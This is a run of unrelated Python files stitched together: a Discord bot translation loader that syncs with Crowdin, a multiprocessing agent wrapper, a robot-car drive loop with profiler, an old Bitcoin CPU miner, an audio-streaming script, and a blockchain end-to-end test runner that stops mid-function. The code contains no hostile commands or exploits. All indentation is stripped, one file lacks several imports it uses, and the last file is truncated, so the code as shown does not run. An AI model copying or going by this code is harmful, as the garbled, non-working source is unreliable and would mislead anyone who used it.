from Util import Configuration, GearbotLogging, Emoji, Utils
LANGS = dict()
LANG_NAMES = dict(en_US= "English")
LANG_CODES = dict(English="en_US")
BOT = None
untranlatable = {"Sets a playing/streaming/listening/watching status", "Reloads all server configs from disk", "Reset the cache", "Make a role pingable for announcements", "Pulls from github so an upgrade can be performed without full restart", ''}
async def initialize(bot_in):
global BOT
BOT = bot_in
await load_codes()
await update_all()
for lang in LANG_CODES.values():
load_translations(lang)
def load_translations(lang):
LANGS[lang] = Utils.fetch_from_disk(f"lang/{lang}")
def translate(key, location, **kwargs):
lid = None
if location is not None:
if hasattr(location, "guild"):
location = location.guild
if location is not None and hasattr(location, "id"):
lid = location.id
else:
lid = location
if lid is None:
lang_key = "en_US"
else:
lang_key = Configuration.get_var(lid, "GENERAL", "LANG")
translated = key
if key not in LANGS[lang_key]:
if key not in untranlatable:
BOT.loop.create_task(tranlator_log('WARNING', f'Untranslatable string detected in {lang_key}: {key}\n'))
untranlatable.add(key)
return key if key not in LANGS["en_US"] else format(LANGS['en_US'][key], kwargs, 'en_US')
try:
translated = format(LANGS[lang_key][key], kwargs, lang_key)
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt translation detected!\n**Lang code:** {lang_key}\n**Translation key:** {key}\n```\n{LANGS[lang_key][key]}```'))
GearbotLogging.exception("Corrupt translation", ex)
if key in LANGS["en_US"].keys():
try:
translated = format(LANGS['en_US'][key], kwargs, 'en_US')
except (KeyError, ValueError, ParseError, VisitationError) as ex:
BOT.loop.create_task(tranlator_log('NO', f'Corrupt English source string detected!\n**Translation key:** {key}\n```\n{LANGS["en_US"][key]}```'))
GearbotLogging.exception('Corrupt translation', ex)
return translated
def translate_by_code(key, code, **kwargs):
if key not in LANGS[code]:
return key
return format(LANGS[code][key], kwargs, code)
async def upload():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY="", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
new = hashlib.md5(open(f"lang/en_US.json", 'rb').read()).hexdigest()
old = Configuration.get_persistent_var('lang_hash', '')
if old == new:
return
Configuration.set_persistent_var('lang_hash', new)
message = await tranlator_log('REFRESH', 'Uploading translation file')
t = threading.Thread(target=upload_file)
t.start()
while t.is_alive():
await asyncio.sleep(1)
await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations file has been uploaded")
await update_all()
def upload_file():
data = {'files[/bot/commands.json]': open('lang/en_US.json', 'r')}
crowdin_data = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
reply = requests.post(f"https://api.crowdin.com/api/project/gearbot/update-file?login={crowdin_data['LOGIN']}&account-key={crowdin_data['KEY']}&json", files=data)
GearbotLogging.info(reply)
async def load_codes():
t_info = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
if t_info["SOURCE"] == "DISABLED": return
GearbotLogging.info(f"Getting all translations from {t_info['SOURCE']}...")
# set the links for where to get stuff
if t_info["SOURCE"] == "CROWDIN":
list_link = f"https://api.crowdin.com/api/project/gearbot/status?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json"
else:
list_link = "https://gearbot.rocks/lang/langs.json"
async with BOT.aiosession.get(list_link) as resp:
info = await resp.json()
l = list()
for lang in info:
l.append(dict(name=lang["name"], code=lang["code"]))
LANG_NAMES[lang["code"]] = lang["name"]
LANG_CODES[lang["name"]] = lang["code"]
Utils.save_to_disk("lang/langs", l)
async def update_all():
futures = [update_lang(lang) for lang in LANG_CODES.values() if lang != "en_US"]
for chunk in Utils.chunks(futures, 20):
await asyncio.gather(*chunk)
async def update_lang(lang, retry=True):
t_info = Configuration.get_master_var("TRANSLATIONS")
if t_info["SOURCE"] == "DISABLED": return
if t_info["SOURCE"] == "CROWDIN":
download_link = f"https://api.crowdin.com/api/project/gearbot/export-file?login={t_info['LOGIN']}&account-key={t_info['KEY']}&json&file={urllib.parse.quote('/bot/commands.json', safe='')}&language={lang}"
else:
download_link = f"https://gearbot.rocks/lang/{lang}.json"
GearbotLogging.info(f"Updating {lang} ({LANG_NAMES[lang]}) file...")
async with BOT.aiosession.get(download_link) as response:
content = await response.text()
content = json.loads(content)
if "success" in content:
if retry:
GearbotLogging.warn(f"Failed to update {lang} ({LANG_NAMES[lang]}), trying again in 3 seconds")
await asyncio.sleep(3)
await update_lang(lang, False)
else:
await tranlator_log('NO', f"Failed to update {lang} ({LANG_NAMES[lang]}) from {t_info['SOURCE']}")
Utils.save_to_disk(f'lang/{lang}', content)
LANGS[lang] = content
GearbotLogging.info(f"Updated {lang} ({LANG_NAMES[lang]})!")
async def tranlator_log(emoji, message, embed=None):
m = f'{Emoji.get_chat_emoji(emoji)} {message}'
return await get_translator_log_channel()(m, embed=embed)
def get_translator_log_channel():
crowdin = Configuration.get_master_var("TRANSLATIONS", dict(SOURCE="SITE", CHANNEL=0, KEY= "", LOGIN="", WEBROOT=""))
channel = BOT.get_channel(crowdin["CHANNEL"]) if crowdin is not None else None
return channel.send if channel is not None else GearbotLogging.bot_log
|
remote.py
|
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import copy
import time
import torch
import torch.multiprocessing as mp
from salina import Agent
from salina.workspace import Workspace, _SplitSharedWorkspace
def f(agent, in_queue, out_queue, seed):
"""The function that is executed in a single process"""
out_queue.put("ok")
running = True
old_workspace = None
print("Seeding remote agent with ", seed)
agent.seed(seed)
while running:
command = in_queue.get()
if command[0] == "go_new_workspace":
_, workspace, kwargs = command
old_workspace = workspace
agent(workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "go_reuse_workspace":
_, _, kwargs = command
agent(old_workspace, **kwargs)
out_queue.put("ok")
elif command[0] == "exit":
out_queue.put("ok")
return
elif command[0] == "eval_mode":
agent.eval()
out_queue.put("ok")
elif command[0] == "train_mode":
agent.train()
out_queue.put("ok")
class RemoteAgent(Agent):
"""It corresponds to an agent that is executed in another process
Args:
Agent ([salina.Agent]): the agent ot execute in another process
"""
def __init__(self, agent, name=None):
super().__init__(name=name)
self.agent = agent
self._is_running = False
self.process = None
self.last_workspace = None
self.train_mode = True
def get_by_name(self, n):
if self._name == n:
return [self] + self.agent.get_by_name(n)
else:
return self.agent.get_by_name(n)
def forward(self, **kwargs):
raise NotImplementedError
def _create_process(self):
print("[RemoteAgent] starting process...")
self.i_queue = mp.Queue()
self.o_queue = mp.Queue()
self.i_queue.cancel_join_thread()
self.o_queue.cancel_join_thread()
self.process = mp.Process(
target=f, args=(self.agent, self.i_queue, self.o_queue, self._seed)
)
self.process.daemon = False
self.process.start()
r = self.o_queue.get()
def __call__(self, workspace, **kwargs):
with torch.no_grad():
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
self.train(self.train_mode)
if not workspace == self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
r = self.o_queue.get()
assert r == "ok"
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
r = self.o_queue.get()
assert r == "ok"
def _asynchronous_call(self, workspace, **kwargs):
"""Non-blocking forward. To use together with `is_running`"""
with torch.no_grad():
self._is_running = True
assert (
workspace.is_shared
), "You must use a shared workspace when using a Remote Agent"
if self.process is None:
self._create_process()
if not workspace == self.last_workspace:
self.i_queue.put(("go_new_workspace", workspace, kwargs))
self.last_workspace = workspace
else:
self.i_queue.put(("go_reuse_workspace", workspace, kwargs))
def train(self, f=True):
self.train_mode = f
if self.process is None:
return
if f:
self.i_queue.put(("train_mode",))
a = self.o_queue.get()
assert a == "ok"
else:
self.eval()
def eval(self):
self.train_mode = False
if self.process is None:
return
self.i_queue.put(("eval_mode",))
a = self.o_queue.get()
assert a == "ok"
def seed(self, _seed):
self._seed = _seed
def _running_queue(self):
return self.o_queue
def is_running(self):
if self._is_running:
try:
r = self.o_queue.get(False)
assert r == "ok"
self._is_running = False
except:
pass
return self._is_running
def close(self):
if self.process is None:
return
print("[RemoteAgent] closing process")
self.i_queue.put(("exit",))
self.o_queue.get()
time.sleep(0.1)
self.process.terminate()
self.process.join()
self.i_queue.close()
self.o_queue.close()
time.sleep(0.1)
del self.i_queue
del self.o_queue
self.process = None
def __del__(self):
self.close()
class NRemoteAgent(Agent):
"""Multiple agents executed in different processes. Use the `NRemoteAgent.create` function to create such an agent"""
def __init__(self, agents, batch_dims):
super().__init__()
self.agents = agents
self.batch_dims = batch_dims
def get_by_name(self, name):
r = []
if self._name == name:
r = [self]
for a in self.agents:
r = r + a.get_by_name(name)
return r
@staticmethod
def create(agent, num_processes=0, time_size=None, **extra_kwargs):
"""Returns a NRemote agent with num_processes copies of agent in different processes
Also returns the specific workspace to use with such an agent
Args:
agent ([salina.Agent]): The agent to execute in multiple processes
num_processes (int, optional): Number of processes to create. If 0, then no processes are created (for debugging). Defaults to 0.
time_size ([type], optional): If specified, it forces the created Workspace to have this particular time_size. Defaults to None.
Returns:
[salina.Agent,salina.SharedWorkspace]: The NRemoteAgent and the corresponding workspace
"""
agent.seed(0)
if num_processes == 0:
workspace = Workspace()
_agent = copy.deepcopy(agent)
agent(workspace, **extra_kwargs)
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=1, time_size=time_size
)
return _agent, shared_workspace
workspace = Workspace()
agents = [copy.deepcopy(agent) for t in range(num_processes)]
agent(workspace, **extra_kwargs)
b = workspace.batch_size()
batch_dims = [(k * b, k * b + b) for k, a in enumerate(agents)]
shared_workspace = workspace._convert_to_shared_workspace(
n_repeat=num_processes, time_size=time_size
)
agents = [RemoteAgent(a) for a in agents]
return NRemoteAgent(agents, batch_dims), shared_workspace
def __call__(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
for a in self.agents:
ok = a._running_queue().get()
assert ok == "ok"
def seed(self, seed, inc=1):
s = seed
for a in self.agents:
a.seed(s)
s += inc
def _asynchronous_call(self, workspace, **kwargs):
assert workspace.is_shared
for k in range(len(self.agents)):
_workspace = _SplitSharedWorkspace(workspace, self.batch_dims[k])
self.agents[k]._asynchronous_call(_workspace, **kwargs)
def is_running(self):
for a in self.agents:
if a.is_running():
return True
return False
def train(self, f=True):
for a in self.agents:
a.train(f)
def eval(self):
for a in self.agents:
a.eval()
def close(self):
for a in self.agents:
a.close()
|
vehicle.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jun 25 10:44:24 2017
@author: wroscoe
"""
import time
from statistics import median
from threading import Thread
from .memory import Memory
from prettytable import PrettyTable
class PartProfiler:
def __init__(self):
self.records = {}
def profile_part(self, p):
self.records[p] = { "times" : [] }
def on_part_start(self, p):
self.records[p]['times'].append(time.time())
def on_part_finished(self, p):
now = time.time()
prev = self.records[p]['times'][-1]
delta = now - prev
thresh = 0.000001
if delta < thresh or delta > 100000.0:
delta = thresh
self.records[p]['times'][-1] = delta
def report(self):
print("Part Profile Summary: (times in ms)")
pt = PrettyTable()
pt.field_names = ["part", "max", "min", "avg", "median"]
for p, val in self.records.items():
# remove first and last entry because you there could be one-off
# time spent in initialisations, and the latest diff could be
# incomplete because of user keyboard interrupt
arr = val['times'][1:-1]
if len(arr) == 0:
continue
pt.add_row([p.__class__.__name__,
"%.2f" % (max(arr) * 1000),
"%.2f" % (min(arr) * 1000),
"%.2f" % (sum(arr) / len(arr) * 1000),
"%.2f" % (median(arr) * 1000)])
print(pt)
class Vehicle:
def __init__(self, mem=None):
if not mem:
mem = Memory()
self.mem = mem
self.parts = []
self.on = True
self.threads = []
self.profiler = PartProfiler()
def add(self, part, inputs=[], outputs=[],
threaded=False, run_condition=None):
"""
Method to add a part to the vehicle drive loop.
Parameters
----------
inputs : list
Channel names to get from memory.
outputs : list
Channel names to save to memory.
threaded : boolean
If a part should be run in a separate thread.
run_condition : boolean
If a part should be run or not
"""
assert type(inputs) is list, "inputs is not a list: %r" % inputs
assert type(outputs) is list, "outputs is not a list: %r" % outputs
assert type(threaded) is bool, "threaded is not a boolean: %r" % threaded
p = part
print('Adding part {}.'.format(p.__class__.__name__))
entry = {}
entry['part'] = p
entry['inputs'] = inputs
entry['outputs'] = outputs
entry['run_condition'] = run_condition
if threaded:
t = Thread(target=part.update, args=())
t.daemon = True
entry['thread'] = t
self.parts.append(entry)
self.profiler.profile_part(part)
def remove(self, part):
"""
remove part form list
"""
self.parts.remove(part)
def start(self, rate_hz=10, max_loop_count=None, verbose=False):
"""
Start vehicle's main drive loop.
This is the main thread of the vehicle. It starts all the new
threads for the threaded parts then starts an infinite loop
that runs each part and updates the memory.
Parameters
----------
rate_hz : int
The max frequency that the drive loop should run. The actual
frequency may be less than this if there are many blocking parts.
max_loop_count : int
Maximum number of loops the drive loop should execute. This is
used for testing that all the parts of the vehicle work.
"""
try:
self.on = True
for entry in self.parts:
if entry.get('thread'):
# start the update thread
entry.get('thread').start()
# wait until the parts warm up.
print('Starting vehicle...')
loop_count = 0
while self.on:
start_time = time.time()
loop_count += 1
self.update_parts()
# stop drive loop if loop_count exceeds max_loopcount
if max_loop_count and loop_count > max_loop_count:
self.on = False
sleep_time = 1.0 / rate_hz - (time.time() - start_time)
if sleep_time > 0.0:
time.sleep(sleep_time)
else:
# print a message when could not maintain loop rate.
if verbose:
print('WARN::Vehicle: jitter violation in vehicle loop '
'with {0:4.0f}ms'.format(abs(1000 * sleep_time)))
if verbose and loop_count % 200 == 0:
self.profiler.report()
except KeyboardInterrupt:
pass
finally:
self.stop()
def update_parts(self):
'''
loop over all parts
'''
for entry in self.parts:
run = True
# check run condition, if it exists
if entry.get('run_condition'):
run_condition = entry.get('run_condition')
run = self.mem.get([run_condition])[0]
if run:
# get part
p = entry['part']
# start timing part run
self.profiler.on_part_start(p)
# get inputs from memory
inputs = self.mem.get(entry['inputs'])
# run the part
if entry.get('thread'):
outputs = p.run_threaded(*inputs)
else:
outputs = p.run(*inputs)
# save the output to memory
if outputs is not None:
self.mem.put(entry['outputs'], outputs)
# finish timing part run
self.profiler.on_part_finished(p)
def stop(self):
print('Shutting down vehicle and its parts...')
for entry in self.parts:
try:
entry['part'].shutdown()
except AttributeError:
# usually from missing shutdown method, which should be optional
pass
except Exception as e:
print(e)
self.profiler.report()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 11084
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
run.py
|
import pafy
import vlc
import time
import multiprocessing
from datawatts import datassette
from datawatts import watts
from datawatts import menu
wattsurl = next(watts.get_url())[1]
dataurl = next(datassette.get_url())
dataname = dataurl[0].split(':')[1].strip()
dataurl = dataurl[1]
video = pafy.new(wattsurl)
best = video.getbest()
wattsurl = best.url
def playurl(url, volume=90):
instance = vlc.Instance('--input-repeat=-1 --novideo --quiet')
# Define VLC player
player = instance.media_player_new()
# Define VLC media
media = instance.media_new(url)
# Set player media
player.set_media(media)
player.audio_set_volume(volume)
# Play the media
try:
player.play()
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
def main():
p1 = multiprocessing.Process(target=playurl, args=(dataurl, 45))
p2 = multiprocessing.Process(target=playurl, args=(wattsurl, 70))
try:
p1.start()
p2.start()
menu.main_menu(dataname=dataname)
except KeyboardInterrupt:
pass
finally:
p1.join()
p2.join()
if __name__ == '__main__':
main()
|
run_end_to_end_test.py
|
#!/usr/bin/env python3
#
# end to end tests of fetch-ledger
#
# This is achieved by using available fetch APIs to spin up a network locally
# and test it can handle certain conditions (such as single or multiple
# node failure)
import sys
import os
import argparse
import yaml
import io
import random
import datetime
import importlib
import time
import threading
import glob
import shutil
import traceback
import time
import pickle
import codecs
import subprocess
from threading import Event
from pathlib import Path
from fetch.cluster.instance import ConstellationInstance
from fetchai.ledger.api import LedgerApi
from fetchai.ledger.crypto import Entity
def output(*args):
text = ' '.join(map(str, args))
if text != '':
sys.stdout.write(text)
sys.stdout.write('\n')
sys.stdout.flush()
class TimerWatchdog():
"""
TimerWatchdog allows the user to specify a callback that will
be executed after a set amount of time, unless the watchdog
is stopped. This lets you dictate the length of tests.
"""
def __init__(self, time, name, task, callback):
self._time = time
self._name = name
self._task = task
self._callback = callback
self._stop_event = Event()
self._stop_event.clear()
def start(self):
self._thread = threading.Thread(target=self._sleep)
self._thread.start()
def _sleep(self):
# This will return false iff the stop event isn't set before the
# timeout
if not self._stop_event.wait(self._time):
output(
"Watchdog '{}' awoke before being stopped! Awoke after: {}s . Watchdog will now: {}".format(
self._name,
self._time,
self._task))
self.trigger()
else:
output("Watchdog safely stopped")
# Notify the waiting thread - this causes it not to trigger.
def stop(self):
self._stop_event.set()
def trigger(self):
self._callback()
def __del__(self):
self.stop()
class TestInstance():
"""
Sets up an instance of a test, containing references to started nodes and other relevant data
"""
def __init__(self, build_directory, constellation_exe, yaml_file):
self._number_of_nodes = 0
self._node_load_directory = []
self._node_connections = None
self._nodes_are_mining = []
self._port_start_range = 8000
self._port_range = 20
self._workspace = ""
self._lanes = 1
self._slices = 16
self._max_test_time = 1000
self._nodes = []
self._metadata = None
self._watchdog = None
self._creation_time = time.perf_counter()
self._block_interval = 1000
# Variables related to temporary pos mode
self._pos_mode = False
self._nodes_pubkeys = []
# Default to removing old tests
for f in glob.glob(build_directory + "/end_to_end_test_*"):
shutil.rmtree(f)
# To avoid possible collisions, prepend output files with the date
self._random_identifer = '{0:%Y_%m_%d_%H_%M_%S}'.format(
datetime.datetime.now())
self._random_identifer = "default"
self._workspace = os.path.join(
build_directory, 'end_to_end_test_{}'.format(
self._random_identifer))
self._build_directory = build_directory
self._constellation_exe = os.path.abspath(constellation_exe)
self._yaml_file = os.path.abspath(yaml_file)
self._test_files_dir = os.path.dirname(self._yaml_file)
verify_file(constellation_exe)
verify_file(self._yaml_file)
# Ensure that build/end_to_end_output_XXX/ exists for the test output
os.makedirs(self._workspace, exist_ok=True)
def append_node(self, index, load_directory=None):
# Create a folder for the node to write logs to etc.
root = os.path.abspath(os.path.join(
self._workspace, 'node{}'.format(index)))
# ensure the workspace folder exits
os.makedirs(root, exist_ok=True)
if load_directory and index in load_directory:
load_from = self._test_files_dir + \
"/nodes_saved/" + load_directory[index]
files = os.listdir(load_from)
for f in files:
shutil.copy(load_from + f, root)
port = self._port_start_range + (self._port_range * index)
# Create an instance of the constellation - note we don't clear path since
# it should be clear unless load_directory is used
instance = ConstellationInstance(
self._constellation_exe,
port,
root,
clear_path=False
)
# Possibly soon to be deprecated functionality - set the block interval
instance.block_interval = self._block_interval
instance.feature_flags = ['synergetic']
# configure the lanes and slices
instance.lanes = self._lanes
instance.slices = self._slices
assert len(self._nodes) == index, "Attempt to add node with an index mismatch. Current len: {}, index: {}".format(
len(self._nodes), index)
self._nodes.append(instance)
def connect_nodes(self, node_connections):
for connect_from, connect_to in node_connections:
self._nodes[connect_from].add_peer(self._nodes[connect_to])
output("Connect node {} to {}".format(connect_from, connect_to))
def start_node(self, index):
print('Starting Node {}...'.format(index))
self._nodes[index].start()
print('Starting Node {}...complete'.format(index))
time.sleep(1)
def setup_pos_for_nodes(self):
# Path to config files
expected_ouptut_dir = os.path.abspath(
os.path.dirname(self._yaml_file)+"/input_files")
# Create required files for this test
file_gen = os.path.abspath(
"./scripts/end_to_end_test/input_files/create-input-files.py")
verify_file(file_gen)
exit_code = subprocess.call([file_gen, str(self._number_of_nodes)])
infofile = expected_ouptut_dir+"/info.txt"
# Required files for this operation
verify_file(infofile)
# infofile specifies the address of each numbered key
all_lines_in_file = open(infofile, "r").readlines()
nodes_mining_identities = []
# First give each node that is mining a unique identity
for index in range(self._number_of_nodes):
# max 200 mining nodes due to consensus requirements
assert(index <= 200)
node = self._nodes[index]
if(node.mining):
node_key = all_lines_in_file[index].strip().split()[-1]
print('Setting up POS for node {}...'.format(index))
print('Giving node the identity: {}'.format(node_key))
nodes_mining_identities.append(node_key)
key_path = expected_ouptut_dir+"/{}.key".format(index)
verify_file(key_path)
# Copy the keyfile from its location to the node's cwd
shutil.copy(key_path, node.root+"/p2p.key")
stake_gen = os.path.abspath("./scripts/generate-genesis-file.py")
verify_file(stake_gen)
# Create a stake file into the logging directory for all nodes
# Importantly, set the time to start
genesis_file_location = self._workspace+"/genesis_file.json"
cmd = [stake_gen, *nodes_mining_identities,
"-o", genesis_file_location, "-w", "10"]
# After giving the relevant nodes identities, make a stake file
exit_code = subprocess.call(cmd)
# Give all nodes this stake file, plus append POS flag for when node starts
for index in range(self._number_of_nodes):
shutil.copy(genesis_file_location, self._nodes[index].root)
self._nodes[index].append_to_cmd(["-pos", "-private-network", ])
def restart_node(self, index):
print('Restarting Node {}...'.format(index))
self._nodes[index].stop()
# Optically remove db files when testing recovering from a genesis file
if False:
self.dump_debug(index)
pattern = ["*.db"]
for p in pattern:
[os.remove(x) for x in glob.iglob('./**/' + p, recursive=True)]
self.start_node(index)
time.sleep(3)
def print_time_elapsed(self):
output("Elapsed time: {}".format(
time.perf_counter() - self._creation_time))
def run(self):
# build up all the node instances
for index in range(self._number_of_nodes):
self.append_node(index, self._node_load_directory)
# Now connect the nodes as specified
if self._node_connections:
self.connect_nodes(self._node_connections)
# Enable mining node(s)
for miner_index in self._nodes_are_mining:
self._nodes[miner_index].mining = True
# In the case only one miner node, it runs in standalone mode
if(len(self._nodes) == 1 and len(self._nodes_are_mining) > 0):
self._nodes[0].standalone = True
else:
for node in self._nodes:
node.private_network = True
# Temporary special case for POS mode
if(self._pos_mode):
self.setup_pos_for_nodes()
# start all the nodes
for index in range(self._number_of_nodes):
if self._number_of_nodes > 1 and not self._pos_mode:
self._nodes[index].append_to_cmd(["-private-network", ])
self.start_node(index)
time.sleep(5) # TODO(HUT): blocking http call to node for ready state
if(self._pos_mode):
output("POS mode. sleep extra time.")
time.sleep(5)
def stop(self):
if self._nodes:
for n, node in enumerate(self._nodes):
print('Stopping Node {}...'.format(n))
if(node):
node.stop()
print('Stopping Node {}...complete'.format(n))
if self._watchdog:
self._watchdog.stop()
# If something goes wrong, print out debug state (mainly node log files)
def dump_debug(self, only_node=None):
if self._nodes:
for n, node in enumerate(self._nodes):
if only_node is not None and n is not only_node:
continue
print('\nNode debug. Node:{}'.format(n))
node_log_path = node.log_path
if not os.path.isfile(node_log_path):
output("Couldn't find supposed node log file: {}".format(
node_log_path))
else:
# Send raw bytes directly to stdout since it contains
# non-ascii
data = Path(node_log_path).read_bytes()
sys.stdout.buffer.write(data)
sys.stdout.flush()
def verify_file(filename):
if not os.path.isfile(filename):
output("Couldn't find expected file: {}".format(filename))
sys.exit(1)
def extract(test, key, expected=True, expect_type=None, default=None):
"""
Convenience function to remove an item from a YAML string, specifying the type you expect to find
"""
if key in test:
result = test[key]
if expect_type is not None and not isinstance(result, expect_type):
output(
"Failed to get expected type from YAML! Key: {} YAML: {}".format(
key, test))
output("Note: expected type: {} got: {}".format(
expect_type, type(result)))
sys.exit(1)
return result
else:
if expected:
output(
"Failed to find key in YAML! \nKey: {} \nYAML: {}".format(
key, test))
sys.exit(1)
else:
return default
def setup_test(test_yaml, test_instance):
output("Setting up test: {}".format(test_yaml))
test_name = extract(test_yaml, 'test_name', expected=True, expect_type=str)
number_of_nodes = extract(
test_yaml, 'number_of_nodes', expected=True, expect_type=int)
node_load_directory = extract(
test_yaml, 'node_load_directory', expected=False, expect_type=dict)
node_connections = extract(
test_yaml, 'node_connections', expected=False, expect_type=list)
mining_nodes = extract(test_yaml, 'mining_nodes',
expected=False, expect_type=list, default=[])
max_test_time = extract(test_yaml, 'max_test_time',
expected=False, expect_type=int, default=10)
pos_mode = extract(test_yaml, 'pos_mode', expected=False,
expect_type=bool, default=False)
test_instance._number_of_nodes = number_of_nodes
test_instance._node_load_directory = node_load_directory
test_instance._node_connections = node_connections
test_instance._nodes_are_mining = mining_nodes
test_instance._max_test_time = max_test_time
test_instance._pos_mode = pos_mode
# Watchdog will trigger this if the tests exceeds allowed bounds. Note stopping the test cleanly is
# necessary to preserve output logs etc.
def clean_shutdown():
output(
